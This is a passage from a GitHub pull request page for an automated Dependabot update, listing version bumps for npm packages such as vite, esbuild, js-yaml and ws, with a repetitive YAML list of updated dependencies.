- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

Updates `vite` from 7.3.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `esbuild` from 0.25.3 to 0.28.1
- [Release notes](https://github.com/evanw/esbuild/releases)
- [Changelog](https://github.com/evanw/esbuild/blob/main/CHANGELOG-2025.md)
- [Commits](evanw/esbuild@v0.25.3...v0.28.1)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 7.3.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `esbuild` from 0.25.3 to 0.28.1
- [Release notes](https://github.com/evanw/esbuild/releases)
- [Changelog](https://github.com/evanw/esbuild/blob/main/CHANGELOG-2025.md)
- [Commits](evanw/esbuild@v0.25.3...v0.28.1)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

---
updated-dependencies:
- dependency-name: "@nestjs/platform-fastify"
  dependency-version: 11.1.24
  dependency-type: direct:production
- dependency-name: "@nestjs/platform-fastify"
  dependency-version: 11.1.24
  dependency-type: direct:production
- dependency-name: "@nestjs/platform-fastify"
  dependency-version: 11.1.24
  dependency-type: direct:production
- dependency-name: "@nestjs/platform-fastify"
  dependency-version: 11.1.24
  dependency-type: direct:production
- dependency-name: esbuild
  dependency-version: 0.28.1
  dependency-type: direct:development
- dependency-name: esbuild
  dependency-version: 0.28.1
  dependency-type: direct:development
- dependency-name: esbuild
  dependency-version: 0.28.1
  dependency-type: direct:development
- dependency-name: form-data
  dependency-version: 4.0.6
  dependency-type: indirect
- dependency-name: form-data
  dependency-version: 4.0.6
  dependency-type: indirect
- dependency-name: form-data
  dependency-version: 4.0.6
  dependency-type: indirect
- dependency-name: form-data
  dependency-version: 4.0.6
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
- dependency-name: nodemailer
  dependency-version: 9.0.1
  dependency-type: direct:production
- dependency-name: nodemailer
  dependency-version: 9.0.1
  dependency-type: direct:production
- dependency-name: typeorm
  dependency-version: 0.3.31
  dependency-type: direct:production
- dependency-name: undici
  dependency-version: 7.28.0
  dependency-type: indirect
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: vite
  dependency-version: 8.1.4
  dependency-type: direct:production
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <[email protected]>
@dependabot
dependabot Bot force-pushed the dependabot/npm_and_yarn/npm_and_yarn-475f5aad77 branch from dc00afa to 2a6b094 Compare July 14, 2026 08:05
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants